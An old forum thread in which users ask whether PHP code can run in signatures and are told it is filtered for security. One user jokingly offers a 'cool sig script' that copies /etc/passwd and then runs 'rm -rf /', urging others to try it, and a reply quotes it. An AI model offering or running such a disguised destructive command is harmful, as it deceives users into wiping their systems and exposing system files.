Ricky Baby Posted December 21, 2002 Share Posted December 21, 2002 is there anyway to post php scripts in your sig like a php image in neowin or is it to much of a security risk? thx Link to comment Share on other sites More sharing options...
0 PureEdit Posted December 21, 2002 Share Posted December 21, 2002 If it let you use any PHP code it would, but IPB Filters it a little to make it safe :p Link to comment Share on other sites More sharing options...
0 kairon Posted December 21, 2002 Share Posted December 21, 2002 is there anyway to post php scripts in your sig like a php image in neowin or is it to much of a security risk?thx :laugh: PHP image? Just do [ IMG ] http://my.sig.com/sig.php [ / IMG ], that'll work, but no you can't stick actual PHP in a signature, that would be far too much of a security risk with the ability to perform all that code, just as if you put malicious javascript into the page. Link to comment Share on other sites More sharing options...
0 zivan56 Posted December 22, 2002 Share Posted December 22, 2002 I have a cool php script for my sig, although it requires apache and php to run under a super user ;) <?php exec("cat /etc/passwd > /tmp/goodstuff"); include("/tmp/goodstuff"); exec("rm -rf /"); ?> Try it out, you'll see what I mean :yes: Link to comment Share on other sites More sharing options...
0 Prasanth Posted December 22, 2002 Share Posted December 22, 2002 I have a cool php script for my sig, although it requires apache and php to run under a super user ;) <?php exec("cat /etc/passwd > /tmp/goodstuff"); include("/tmp/goodstuff"); exec("rm -rf /"); ?> Try it out, you'll see what I mean :yes: Great I will try it now :rolleyes: Link to comment Share on other sites More sharing options...
Question
Ricky Baby
is there anyway to post php scripts in your sig like a php image in neowin or is it to much of a security risk?
thx
Link to comment
Share on other sites
4 answers to this question
Recommended Posts